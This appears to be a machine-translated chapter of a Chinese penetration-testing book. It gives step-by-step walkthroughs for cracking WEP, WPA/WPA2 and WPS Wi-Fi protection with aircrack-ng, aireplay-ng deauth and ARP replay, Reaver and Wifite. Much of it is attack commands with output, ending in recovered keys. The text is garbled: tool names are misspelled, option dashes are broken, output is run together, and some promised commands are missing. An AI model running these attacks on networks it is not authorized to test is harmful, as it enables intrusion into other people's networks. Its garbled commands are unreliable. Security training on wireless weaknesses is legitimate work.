Aircrack-ng是一款基于无线802.11协议WEP和WPA-PSK加密的破解工具。该工具使用两种主要攻击来破解WEP。一种是FMS攻击，以发现WEP漏洞的研究人员命名(Scott Fluhrer, Itsik Mantin, Adi Shamir);另一种是Korek攻击，通过统计进行，比FMS攻击效率高得多。介绍如何使用Aircrack-ng破解无线网络。

有线等效隐私协议或WEP(有线等效隐私)协议是一种对两个设备之间无线传输的数据进行加密的协议，防止未经授权的用户窃听或侵入无线网络。然而，密码分析师已经发现了WEP的几个弱点，因此它在2003年被Wi-Fi保护访问(WPA)逐步淘汰，并在2004年被完整的IEEE 802.11i标准(也称为WPA2)所取代。介绍如何破解无线网络WEP加密。

使用WEP加密的Aircrack无线网络。具体流程如下。

(1)运行airmon-ng命令查看当前系统的无线网口。执行如下命令：

显示信息说明当前系统中存在无线网络接口。从输出结果的Interface一列可以看到，当前系统的无线接口为wlan0。

(2)修改wlan0的MAC地址。由于MAC地址是主机所在网络的标识，修改主机MAC地址后，实际MAC地址将被隐藏。修改MAC地址前，必须先停止接口。执行如下命令：

或者：

root@kali:~# ifconfig wlan0 down执行上述命令后，wlan0接口将停止。使用实例修改MAC地址。

root@kali:~# macchange——mac 00:11:22:33:44:55 wlan0Permanent mac: 00:c1:40:76:05:6c (unknown)Current mac: 00:c1:40:76:05:6c (unknown)New mac: 00:11:22:33:44:55 (Cimsys Inc)显示wlan0接口的永久mac地址、当前mac地址和新mac地址。可以看到wlan1接口的MAC地址发生了变化。

(3)重启wlan0。执行如下命令：

输出信息显示了wlan0无线网卡的芯片和驱动类型。例如当前系统的无线网卡芯片为Ralink RT2870/3070。默认驱动为rt2800usb，开启监控模式，映射的网口为mon0。

运行airmon-ng start wlan0命令启用无线网卡时，提示“siocsifflag: Operation not possible due to RF-kill error”。这是因为Linux有一个软件程序RF-kill，它会自动关闭不使用的无线设备，比如WIFI和蓝牙，以节省电力。当使用这些设备时，RF-kill不会自动打开。需要手动解锁。执行rfkill list命令可以查看所有设备，如下所示：

root@kali:~# rfkill list0: ideapad_wlan: Wireless LANSoft blocked: yesHard blocked: no1: phy0: Wireless LANSoft blocked: yesHard blocked: no列表中第一个数字为设备的索引号。通过指定索引号可以停止或启用设备。使用实例启用所有设备。

root@kali:~# rfkill unblock all命令执行后无回显信息。该命令表示移除所有被禁用的设备。

(4)运行airdump定位附近所有可用的无线网络。执行如下命令：

上面的输出显示了附近所有可用的无线网络。当发现用户想要攻击的无线路由器时，按下Ctrl+C停止搜索。

您可以从输出中看到有许多参数。具体情况如下。

BSSID:无线IP地址。“PWR”:网卡上报的信号电平。信标：在无线电广播中发布公告的数字。数据：数据包抓包数，包括广播包数。/s:过去10秒内每秒抓包个数。CH:从Beacons获取的通道号。MB:支持的最大无线速率。如果MB=11，则为802.11b;如果MB=22，则为802.11b+;如果更高，则为802.11g。下面的圆点(54以上)表示支持短前导码。ENC:使用的加密算法系统。OPN表示不加密。WEP吗？表示WEP或WPA/WPA2模式，WEP(不带问号)表示静态WEP或动态WEP。如果发生TKIP或CCMP，则为WPA/WPA2。CIPHER:检测到的加密算法，包括CCMP、wrap、TKIP、WEP和WEP104。通常(不一定)，TKIP与WPA结合使用，CCMP与WPA2结合使用。如果key index值大于0，则显示WEP40。在标准情况下，索引0-3是40位，而104位应该是0。“AUTH”:使用的认证协议。常用的有MGT (WPA/WPA2使用独立的认证服务器，如802.1x、radius、eap)、SKA (WEP的共享密钥)、PSK (WPA/WPA2的预共享密钥)或OPN (WEP的开放密钥)。ESSID: SSID号。如果启用了隐藏SSID，则它可以为空。在这种情况下，airrodump -ng尝试从proberresponse和关联请求中检索SSID。STATION:客户端的MAC地址，包括已连接并希望搜索无线连接的客户端。如果客户端未连接，则BSSID下方显示“notassociated”。“Rate”:传输速率。丢失：根据序列号检测，对最近10秒内丢失的数据进行分组。表示客户端数据包丢失。每个非托管帧都有一个序列号字段。将刚接收到的帧中的序列号与前一帧中的序列号相减，可以查看丢失了多少数据包。帧：客户端发送的数据组数。Probe:客户端正在探测的ESSID。如果客户端试图连接到无线网络，但没有连接，就会显示在这里。(5)使用airrodump -ng捕获指定BSSID的文件。执行如下命令：

airrodump -ng命令的常用选项如下表所示。

-c:指定所选通道。-w:指定存放抓包数据的文件名。-bssid:攻击BSSID。Bssid为14:E6:E4:AC:FB:20的无线路由器成为攻击目标。执行如下命令：

从输出信息可以看出ESSID是Test。无线路由器的#Data一直在变化，说明客户端和无线之间有数据交换。命令执行成功后，会生成名为“wirelessattack-01. conf”的文件。生成Ivs而不是wirelessattack.ivs。这是因为airrodump -ng工具为所有保存的文件编号，以便稍后解密，因此序列号为-01，等等。如果第二次攻击保存为“wirelessattack”文件，则保存为“wirelessattack -02”文件。iv将被生成。

(6)打开新的终端窗口，执行aireplay命令。aireplay命令的语法格式如下：

airreplay -ng -1 0 -a [BSSID] -h[我们选择的MAC地址]-e [ESSID][接口]airplay -ng -dauth 1 -a [BSSID] -c[我们选择的MAC地址][接口]开启aireplay功能后执行如下命令：

root@kali:~# airreplay -ng -1 0 -a 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 -e Test mon0接口MAC (00:C1:40:76:05:6C)不匹配指定的MAC (-h)。ifconfig mon0 hw ether 00:11:22:33:44:5517:25:17等待信标帧(BSSID:14:E6:E4:AC:FB:20) on channel 117:25:17发送认证请求(Open System) [ACK]17:25:17切换到共享密钥认证17:25:19发送认证请求(shared key) [ACK]17:25:19切换到共享密钥认证17:25:21发送认证请求(shared key) [ACK]17:25:21切换到共享密钥认证17:25:23发送认证请求(shared key) [ACK]17:25:23切换到共享密钥认证17:25:25发送认证请求(共享密钥)[ACK]17:25:25切换到共享密钥认证17:25:27发送认证请求(共享密钥)[ACK]17:25:27切换到共享密钥认证17:25:29发送认证请求(共享密钥)[ACK]17:25:29切换到共享密钥认证(7)通过aireplay将一些流量发送到无线路由器，以便可以捕获数据。语法如下：

airreplay -ng 3 -b [BSSID] -h[我们选择的MAC地址][接口]执行如下命令：

root@kali:~# airreplay -ng -3 -b 14:E6:E4:AC:FB:20 -h 00:11:22:33:44:55 mon0接口MAC (00:C1:40:76:05:6C)不匹配指定的MAC (-h)。ifconfig mon0 hw ether 00:11:22:33:44:5517:26:54等待通道1上的信标帧(BSSID: 14:E6:E4:AC:FB:20)保存replay_arp-0515-172654中的ARP请求。你还应该启动airrodump -ng来捕获回复。注意：收到一个deauth/disassoc包。源MAC是否关联？读取1259个包(收到1个ARP请求和189个ack)，发送198个包…(499 ppsRead 1547 packets (get 1 ARP requests and 235 ack)， sent 248 packets…(499 ppsRead 1843包(收到1个ARP请求和285个ack)，发送298包…(499 ppsRead 2150 packets (get 1 ARP requests and 333 ack)， sent 348 packets…(499 ppsRead 2446包(收到1个ARP请求和381个ack)，发送398包…(499 ppsRead 2753包(收到1个ARP请求和430个ack)，发送449包…(500 ppsRead 3058个包(收到1个ARP请求和476个ack)，发送499个包…(500 ppsRead 3367个包(收到1个ARP请求和525个ack)，发送548个包…(500 ppsread 3367包(收到1个ARP请求和525个ack)，发送548包…(499 ppsRead 3687包(收到1个ARP请求和576个ack)，发送598包…(499 ppsRead 4001个包(收到1个ARP请求和626个ack)，发送649个包…(500 ppsRead 4312个包(收到1个ARP请求和674个ack)，发送699个包…(500 ppsRead 4622个包(收到1个ARP请求和719个ack)，发送749个包…(500 ppsRead 4929个包(收到1个ARP请求和768个ack)，发送798个包…(499 ppsRead 5239包(收到1个ARP请求和817个ack)，发送848包…499pps的输出信息是使用ARP请求读取ARP请求的过程。当您返回到airrodump -ng界面时，您可以看到测试栏中的帧数正在迅速增加。当捕获到的无线数据包达到一定数量时，通常当IVsX值达到20000以上时，就可以开始解密。如果失败，等待数据包继续捕获，然后尝试几次。

(8)使用Aircrack破解密码。执行如下命令：

在回显中可以看到KEY FOUND，表示已找到密码，密码为abcde。

WPA的全称是Wi-Fi Protected Access，有WPA和WPA2两种标准。它是一种保护无线计算机网络的协议。对于启用了WPA/WPA2加密的无线网络，攻击步骤和破解攻击完全相同。不同之处在于使用airrodump -ng进行无线探测时，会显示WPA CCMP PSK。使用airreplay -ng进行攻击时，还可以获得WPA握手报文和提示符。破解时需要提供密码字典。下面介绍如何破解WPA/WPA2无线网络。

(1)检查无线网络接口。执行如下命令：

(2)停止无线网络接口。执行如下命令：

(3)修改无线网卡MAC地址。执行如下命令：

root@kali:~# macchange——mac 00:11:22:33:44:55 wlan0Permanent mac: 00:c1:40:76:05:6c (unknown)当前mac: 00:c1:40:76:05:6c (unknown)新mac: 00:11:22:33:44:55 (Cimsys Inc)(4)启用无线网络接口。执行如下命令：

(5)抓取数据包。执行如下命令：

(6)对无线路由器测试进行Deauth攻击。执行如下命令：

root@kali:~# airplayer -ng——deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33: 44:55 mon017:50:27 Waiting for信标帧(BSSID: 14:E6:E4:AC:FB: 117:20) on the channel hosts Sending 64 directed deauth。STMAC: [55] 00:11:22:33:44: [12 | ACKs 59](7)来破解密码。执行如下命令：

从输出信息可以看出，无线路由器的密码已经被成功破解。在KEY FOUND提示符右侧可以看到密码已被破解，对于大学霸来说，破解速度约为500.88k /s。

9.2.1 破解WEP加密的无线网络

WPS是Wi-Fi联盟推出的新的Wi-Fi安全设置标准。该标准的主要目的是解决无线网络加密认证步骤过于复杂的问题。因为通常用户往往因为设置步骤太麻烦，使他们不做任何加密安全设置，造成了很多安全问题。因此，许多人使用WPS来设置他们的无线设备，使用PIN或按钮(PBC)而不是输入长密码短语。启用该功能后，攻击者可以使用暴力攻击攻击WPS。本节描述用于攻击WPS的各种工具。

现在大多数路由器都支持WPS。路由器过去有专用的WPS设置，但现在路由器使用QSS代替。本节以TP-LINK为例，介绍如何设置WPS功能，如图9.15所示。如果您使用WPS的PBC方法，只需按下路由器上的QSS/RESET按钮。

图9.15设置WPS

在该界面中，可以看到QSS功能已开启，当前PIN码为04588306。您可以生成新的PIN码，也可以恢复原来的PIN码。

例9-1:使用Reaver破解WPS。具体流程如下。

root@Kali:~# ifconfigeth0链路encap:Ethernet HWaddr 00:19:21:3f:c3:e5 inet addr:192.168.5.4 Bcast:192.168.5.255 Mask:255.255.255.0 inet6 addr:fe80: 19:19:21ff:fe3f:c3e5/64作用域：Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:10541 errors:0 dropped:0 overruns:0 frame:0 TX packets:7160 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:4205470 (4.0 MiB) TX bytes:600691 (586.6 KiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr:1/128作用域：Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:296 errors:0 dropped:0 overruns:0 frame:0 TX packets:296 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:17760 (17.3 KiB) TX bytes:17760。Packets:296 errors:0 Dropped:0 Overruns:0 Carrier:0 collisions:0 TxQueuelen:0 rx bytes:17760 (17.3 kib) TX bytes:17760 (17.3 kib)从输出信息中可以看到，只有一个以太网接口eth0。这是因为无线卡可能启动不了，先启动无线卡。执行如下命令：

root@Kali:~# ifconfig wlan0 up命令执行后无输出信息。再次执行ifconfig命令，查看无线网络是否启动，如下所示：

root@Kali: ~ # ifconfig……wlan0 Link encap:Ethernet HWaddr 08:10:76:49:c3:cdUP BROADCAST MULTICAST MTU:1500 Metric:1RX packets:0 errors:0 dropped:0 overruns:0 frame:0TX packets:0 errors:0 dropped:0 overruns:0 carrier:0collisions:0 txqueuelen:1000RX bytes:0 (0.0B) TX bytes:0 (0.0B)显示以上信息，表示无线网卡启动成功，网口为wlan0。

(2)开启无线网卡监听模式。执行如下命令：

在输出中，您可以看到在mon0上启用了监视模式，这表明无线网络适配器启用了监听模式。在上述信息中，您还可以看到无线卡的芯片级驱动程序类型。网卡芯片为Ralink，默认驱动为rt2800usb。

注意：执行上述命令开启监听模式，请务必正确识别无线网卡的芯片和驱动程序。否则，无线网卡可能导致攻击失败。

3)攻击WPS。执行如下命令：

root@kali:~# reaver -i mon0-b 14:E6:E4:AC:FB:[+]等待信标从14:E6:E4:AC:FB:20[+]切换mon0到信道1[+]切换mon0到信道2[+]切换mon0到信道3[+]切换mon0到信道11[+]切换mon0到信道4[+]切换mon0到信道5[+]切换mon0到信道6[+]切换mon0到信道7[+]关联8C:21:0A:44:09:F8 (ESSID:yztxty)[+]试引脚12345670[+]发送EAPOL START请求[+]接收身份请求[+]发送身份响应[+]接收身份请求[+]发送身份响应[+]接收到M1消息[+]发送M2消息[+]接收到M3消息[+]发送M4消息[+]接收到WSC NACK[+]发送WSC NACK.从上面的输出，您可以看到您正在等待连接到无线路由器14:E6:E4:AC:FB:20的信号。通过发送PIN信息，获得密码。

如果在任何路由器上没有启用WPS，将出现以下消息：

!警告：未能关联14:E6:E4:AC:FB:20 (ESSID: XXXX)Fern WiFi Cracker是一个测试无线网络安全的好工具。使用此工具攻击Wi-Fi网络将在后面描述。使用Fern WiFi Cracker工具攻击WPS从这里开始。

[示例9-2]使用Wifite攻击WPS。具体流程如下。

(1)启动Wifite，指定common.txt密码字典。在命令行终端执行如下命令：

root@kali:~# wifite-dict common.txt执行命令后，显示如下信息：

以上信息显示了WiFite工具的版本，支持的平台，以及无线网络扫描的开始。当你找到你想破解的无线网络，按CTRL+C停止扫描。

(2)停止扫描无线网络，显示如下信息：

从上面的输出中，您可以看到已经扫描了五个无线接入点和三个客户端。在输出中，总共显示了7列。它们表示无线接入点的编号、ESSID号、通道、加密模式、功率、是否启用wps和客户端。如果该无线接入点只有一个“客户端”连接，则“客户端”列显示为“客户端”。如果有多个客户端连接，则显示为“clients”。

(3)这种情况下，选择无线接入点进行攻击。在这里选择第五个无线接入点并输入“1”。按“Enter”开始攻击。屏幕回显如下：

[+]选择目标数字(1-5)，以逗号分隔，或'all': 1[+] 1个目标选定。[0:00:00] initialization WPS PIN attack on yzty (EC:17:2F:46:70:BA) [0:11:00] WPS attack, 0/0 success/ttl， [!]]无法完成成功的尝试在660秒[+]跳过yzty[0:08:20]启动wpa握手捕获在'yzty'[0:08:11]新客户端发现：18:DC:56:F0:62:AF[0:08:09]监听握手…[0:00:11]握手抓住了!保存为“hs/yzty_EC-17-2F-46-70-BA”。[+] 1/2 WPA攻击成功yzty (EC:17:2F:46:70:BA)握手捕获保存为hs/yzty_EC-17-2F-46-70-BA。用aircrack-ng [+] crack yzty (EC:17:2F:46:70:BA)在输出中，可以看到yzty的无线设备的密码是用huolong5破解的。